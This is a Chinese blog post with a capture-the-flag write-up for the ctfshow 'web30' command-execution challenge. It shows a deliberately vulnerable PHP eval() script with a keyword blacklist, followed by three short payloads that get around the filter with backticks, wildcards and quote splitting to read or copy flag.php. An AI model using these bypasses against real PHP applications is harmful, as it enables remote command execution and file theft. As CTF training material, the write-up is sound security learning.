ctfshow-web入门-命令执行-web30

最新推荐文章于 2024-06-06 15:57:16 发布
最新推荐文章于 2024-06-06 15:57:16 发布
阅读量257 收藏
点赞数 2
分类专栏: #命令执行 ctfshow 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HkD01L/article/details/125396402
版权
本文介绍了CTF中web30级别的挑战,重点在于如何通过各种命令执行技巧绕过过滤限制。包括使用`tac`、`nl`、`cp`等命令读取或复制文件,嵌套`eval`、`include`、`require`进行参数逃逸和文件包含,以及利用伪协议和base64解码获取敏感文件`flag.php`的内容。
摘要由CSDN通过智能技术生成

 web30

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

 过滤了flag,system,php

flag和php可以使用通配符?或*绕过

system()函数被禁用可以使用别的函数来命令执行

姿势一?c=echo `tac fla?.*`;

姿势二?c=echo `nl fl''ag.p''hp`;查看源代码

 

  姿势三 ?c=`cp fla?.* 1.txt`;

 利用反引号命令执行将flag.php复制成1.txt然后访问

<

最低0.47元/天 解锁文章
HkD01L
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow-web入门-命令执行-web29
HkD01L的博客
06-21 321
ctfshow,命令执行web29
ctfshow-WEB入门-命令执行WEB29~WEB44)
weixin_40103894的博客
11-28 637
ctfshow-WEB入门-命令执行WEB29~WEB44)
ctfshow-web入门-命令执行web30-web36)
最新发布
Welcome To Myon'Blog !
06-06 1039
命令执行,需要严格的过滤。
CTFshow web入门命令执行web29-web77)
小白的博客
05-10 1445
2、然后上传一个new2.php文件并抓包,多试几次,因为不一定生成的临时文件的最后一个字母是大写,文件内容如下。1、先构造一个文件上传的html页面,代码如下(test-fileupdown.html)3、在上传文件的过程中,抓包,之后添加参数c=.%20/?4、所以传入这个参数的意思就是匹配上传command.php所生成的临时文件,并执行。接着直接用cat flag.php查看一下flag.php文件就好了。略(与web41相同)
ctfshow-web入门——命令执行(1)(web29-web40)
m0_62905745的博客
03-16 908
本篇文章是ctfshow的web入门部分的命令执行部分wp(web29-web 40),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web41~60-WP
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
CTFShow-周末大挑战parse-url篇Writeup
05-19
这表明服务端没有对用户输入进行充分的过滤或转义,允许了任意命令执行。 第二关中,URL编码的方式被用来绕过过滤。`%68%74%74%70%3a%2f%2f%64%61%74%61%3a%3a%2f%2f%74%65%73%74%2f%70%6c%61%69%6e%3b%62%61%73%65...
ctfshow web入门 命令执行 web29~web77 web118~web124
qq_62989306的博客
09-13 2096
eval函数实现RCE、文件包含通过data协议实现RCE、eval函数无数字字母实现RCE、system函数绕过>/dev/null 2>&1实现RCE、system函数各种骚操作实现RCE。无参数RCE、无数字字母RCE、绕过open_basedir、PDO连接数据库load_fiel读取文件、利用FFI调用C库的system函数、环境变量……
ctfshow-web入门-命令执行
qq_43618536的博客
07-08 816
ctfshow-web入门-命令执行
CTFshow—web入门——命令执行
h_adam的博客
10-07 2890
web入门——命令执行web29功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 web29 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客
ctfshow web入门命令执行
uuzfumo的博客
12-17 1084
命令执行姿势
ctfshow web 入门 命令执行
wsitcj的博客
02-20 367
1、直接传 c=system(‘cat f*’)
CTFShow Web入门 命令执行
qq_19533763的博客
04-01 7118
命令执行绕过姿势:https://blog.csdn.net/qq_45836474/article/details/107248010 Web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 可以看
CTFshow Web入门 命令执行
m0_62905261的博客
05-01 1307
CTFshow Web入门 命令执行
ctfshow web入门 命令执行
qq_53263789的博客
07-19 1480
ctfshow
ctfshow-web入门爆破
08-30
在ctfshow-web入门爆破中,可以使用正则爆破脚本来实现对目录的暴力破解。该脚本会将true拼接成数字,并以此来替换ASCII码中的数字、字母和特殊符号,以实现对目录的爆破。通过暴力破解目录/0-100/0-100/看返回...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值